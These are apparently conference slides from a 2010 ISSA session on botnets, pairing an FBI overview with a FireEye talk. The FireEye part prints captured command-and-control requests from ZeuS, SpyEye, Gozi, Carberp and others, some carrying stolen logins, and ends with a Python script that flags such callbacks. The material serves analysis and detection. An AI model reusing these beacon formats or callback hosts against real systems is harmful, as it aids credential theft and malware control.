Botnets Sponsored By


Botnets
Sponsored by: ISSA Web Conference
October 26, 2010
Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

Welcome: Conference Moderator
Phillip H Griffin, Member - ISSA Educational Advisory Council, Web Conferences Committee

Agenda
• How Botnets Have Evolved – Chris Calderon - Special Agent, FBI
• Rooting Out the Bad Actors – Alex Lanstein - Systems Consulting Engineer, FireEye
• Joint Speaker Question & Answer
• Closing Comments

UNCLASSIFIED

How Botnets Have Evolved
presented by Special Agent Chris Calderon, FBI

Agenda
• What is a botnet?
• How are botnets created?
• Why are botnets created?
• Basic structure of a botnet
• Taking down a botnet
• How botnets are evolving
• Botnets in the news
• Questions

What is a botnet?
• A network of compromised computers (robots/bots)
• Controlled by a bot master / herder
• Used to carry out various illegal activities
• Services are often sold to other criminal elements

How are botnets created?
Setup
• Obtain reliable infrastructure
• Develop malware and C&C software
Victims
• Malware loaded onto victim machines
• Done through exploits and/or social engineering
Manage
• Continually update software / instructions to bots
• Maintain statistics for the botnet

Why are botnets created?
• Spam
• Distributed Denial of Service (DDoS)
• Click Fraud
• Fake Anti-Virus
• Credential Theft
• Proxy Service
• Cyber Warfare

Basic Structure
(Diagram: bot master / herder → C&C servers → victims)

Taking down a botnet
(Diagram: the same bot master / C&C server / victim layout)

Botnets evolving
(Diagram: bot master / herder → proxies → C&C servers → victims)

Botnets evolving
(Diagram: bot master / herder → proxies → C&C servers → a second layer of proxies → victims)

Botnets in the news
• ZEUS
  – Steals and logs online banking credentials
  – Primarily targets high balance accounts
  – Money “mules” used to get money to bad actors
  – Kit now used by many different groups
  – Estimated $70,000,000 stolen from US banks

Botnets in the news
• MARIPOSA (BUTTERFLY)
  – Steals online credentials, and also used in DDoS attacks
  – Estimated 12 million infected computers
  – Bad actors traced to Spain and arrested
  – Criminal proceedings ongoing

Botnets in the news
• SPAM BOTS
  – Conficker, Cutwail, Waledac, ….
  – Up to 10 million bots per botnet
  – Each botnet can send billions of spam emails per day
  – Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising, ….

Questions?

Rooting out the Bad Actors
or: p2p, fast flux, and other botnet myths
Alex Lanstein, Senior Security Researcher, FireEye, Inc.

Today’s Agenda
• Understanding the shift from conventional to modern malware, and the resultant hosting needs
• A few TT&P to uncover older or moderately sophisticated malware
• A detailed look at a few bots “in the news”

Conventional vs. Modern, APT Malware
Conventional Malware
• Characterized by using “spreading” techniques, custom C&C transport protocols, IRC communication
  – Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots
• Detectable through a variety of technologies/tactics:
  – NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS
  – Port scanning, high Windows port activity, non-HTTP over port 80, non-web traffic, etc.

Conventional vs. Modern Malware
Modern-ish malware:
– Characterized by infecting via browser-based exploits
– Exploit Channel: PDF, Flash, IE/Firefox, QuickTime; C&C Callback over HTTP(s)
– Malware: ZeuS, Gozi, Koobface, Rustock, SpyEye
– Partially detectable through manual traffic analysis fairly easily, but a full-time resource is needed

World’s Top Malware
(Chart; source: FireEye Malware Intelligence Lab)

Modern Malware Infection Lifecycle
1. System gets exploited
   . Drive-by attacks in casual browsing
   . Links in targeted emails
   . Socially engineered binaries
2. Dropper malware installs
   . First step to establish control
   . Calls back out to criminal servers
   . Found on compromised sites, and Web 2.0, user-created content sites
3. Malicious data theft & long-term control established
   . Uploads data stolen via keyloggers, Trojans, bots, & file grabbers
   . One exploit leads to dozens of infections on same system
   . Criminals have built long-term control mechanisms into system
(Diagram labels: compromised Web server or Web 2.0 site; callback server; perimeter security (signature, rule-based); other gateway (list-based, signatures); desktop antivirus; “Losing the threat arms race”)

Where is all this malware being hosted?
• Previously we used to see malware being hosted on infected home machines
• Web filters responded by blocking access to domains that had multiple A records in residential IP space
• Now it’s being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR registered IP space!

Root of the Problem
• There is no “Internet Police”!
• Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
• Depends who you ask and how big a stink you make.

How the Internet is delegated
In the name space (think DNS):
• ICANN → Registries
• Registries == Verisign, Affilias, ccTLD operators
• Registries sell to certified gTLD and regional registrars
• Registrars == namecheap.com, godaddy.com, netsol.com
• Registrars sell to registrants (end user)

How the Internet is delegated
In the IP space:
• ICANN/IANA (Internet Assigned Numbers Authority)
• IANA → RIRs
• RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
• RIRs → LIRs
• LIRs are generally data centers and ISPs

ICANN’t do anything!
• ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn’t violate the contract. These contracts have no mention of “content”.
• Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
• Large pushback when someone even suspects they are trying to take an authoritative stance on something.
Big bots in 2010

Rustock – still sticking around

    POST /index.php?topic=33.117 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Referer: http://go-thailand-now.com/
    Content-Type: application/x-www-form-urlencoded
    Content-Encoding: gzip
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
    Host: go-thailand-now.com
    Content-Length: 214
    Connection: Keep-Alive
    Cache-Control: no-cache

Gozi

    POST /cgi-bin/forms.cgi HTTP/1.0
    Content-Type: multipart/form-data; boundary=--------------------------139b9b3139b9b3139b9b3
    User-Agent: IE
    Host: 91.216.215.130
    Content-Length: 453
    Pragma: no-cache

    ----------------------------139b9b3139b9b3139b9b3
    Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"
    Content-Type: application/octet-stream

    URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901FhI&it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&=
    mousemove
    ----------------------------139b9b3139b9b3139b9b3--

Zeus

    POST /xed/gate.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
    Host: schastlivieiveselierebyta0001.com
    Content-Length: 329
    Connection: Keep-Alive
    Cache-Control: no-cache

    [encrypted binary body not reproduced]

Tigger – Not just financials anymore

    POST /track_c.cgi HTTP/1.0
    Content-Length: 81

    [encrypted binary body not reproduced]

    SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timezoneOct=420&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true&awcharset=UTF-8&KEYLOG=s}}}

SpyEye – ZeuS replacement?

    GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232&ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKLAF24&md5=9012ab902413dcf8gga89 HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: hahsdhsl.com
    Pragma: no-cache

    GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.promohru.in
    Pragma: no-cache

Carberp – Yet Another Datastealer

    POST /recv.php HTTP/1.1
    Host: 194.54.80.146
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
    Accept: text/html
    Connection: Close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 331

    uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1&data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom%2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7
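The captures above share a few header-level tells that an analyst doing the "manual traffic analysis" the talk mentions would look for: a bare IP in the Host header, a User-Agent that is not a real browser string, a gate-style script path, a gzip-compressed request body, and guid/ver/stat/md5 beacon keys. The Python triage script below is an added illustration of scoring those tells, not part of the talk or of any FireEye tooling; the sample requests in it are constructed to mirror the shape of the captures, with made-up hosts and values.

```python
"""Header-level triage of HTTP requests for the C&C callback tells seen in the
talk's Rustock, Gozi, SpyEye and Carberp captures.  Added example, not from the
talk or from FireEye; the sample requests below are constructed."""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Script names the captured bots post to; "gate" is the Zeus/SpyEye term.
GATE_SCRIPTS = {"gate.php", "recv.php", "track_c.cgi", "forms.cgi"}
# Query keys a SpyEye-style beacon carries (bot id, build, state, hashes).
BEACON_KEYS = {"guid", "uid", "ver", "stat", "md5", "ccrc"}


def parse_request(raw):
    """Split a raw request into (method, target, version, headers); body ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = [ln for ln in head.split("\r\n") if ln]
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def is_ip_literal(host):
    """True when the Host header is a bare IPv4 address rather than a DNS name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
    except ValueError:
        return False
    return True


def flag_request(raw):
    """Return the indicators a request trips (empty list = nothing notable)."""
    method, target, version, h = parse_request(raw)
    url = urlsplit(target)
    flags = []
    if is_ip_literal(h.get("host", "")):
        flags.append("host-is-ip-literal")       # Gozi, Carberp: no domain at all
    if "(" not in h.get("user-agent", ""):
        flags.append("bare-user-agent")          # "IE", "Microsoft Internet Explorer"
    if url.path.rsplit("/", 1)[-1] in GATE_SCRIPTS:
        flags.append("gate-script-path")
    if "gzip" in h.get("content-encoding", "").lower():
        flags.append("compressed-request-body")  # Rustock: browsers never send this
    if len(BEACON_KEYS & set(parse_qs(url.query))) >= 2:
        flags.append("beacon-query-keys")        # SpyEye guid/ver/stat/md5
    if version == "HTTP/1.0":
        flags.append("http-1.0")                 # weak on its own; browsers use 1.1
    return flags


def suspicious(raw, threshold=2):
    """Treat two independent tells as enough to pull the flow for analyst review."""
    return len(flag_request(raw)) >= threshold


def _req(*lines):
    return "\r\n".join(lines) + "\r\n\r\n"


# Constructed samples that mirror the shape of the talk's captures (not real traffic).
SAMPLES = {
    "benign": _req(
        "GET /index.html HTTP/1.1",
        "Host: www.example.com",
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10",
        "Accept: text/html",
    ),
    "rustock_like": _req(
        "POST /index.php?topic=33.117 HTTP/1.1",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Encoding: gzip",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Host: forum.example",
        "Cache-Control: no-cache",
    ),
    "gozi_like": _req(
        "POST /cgi-bin/forms.cgi HTTP/1.0",
        "Content-Type: multipart/form-data; boundary=----x",
        "User-Agent: IE",
        "Host: 192.0.2.10",
        "Pragma: no-cache",
    ),
    "spyeye_like": _req(
        "GET /web/map/gate.php?guid=user1!ABC!123&ver=10280&stat=ONLINE&plg=ftpbc&md5=0123abcd HTTP/1.0",
        "User-Agent: Microsoft Internet Explorer",
        "Host: gate.example",
        "Pragma: no-cache",
    ),
}


def triage(samples=SAMPLES):
    """Map each sample name to its indicator list."""
    return {name: flag_request(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, flags in triage().items():
        verdict = "SUSPICIOUS" if suspicious(SAMPLES[name]) else "ok"
        print(f"{name:13s} {verdict:10s} {flags}")
```

The Rustock-like request trips only the compressed-body tell, which is why the script needs two tells before it raises anything; a single header oddity on its own is a poor filter on real traffic.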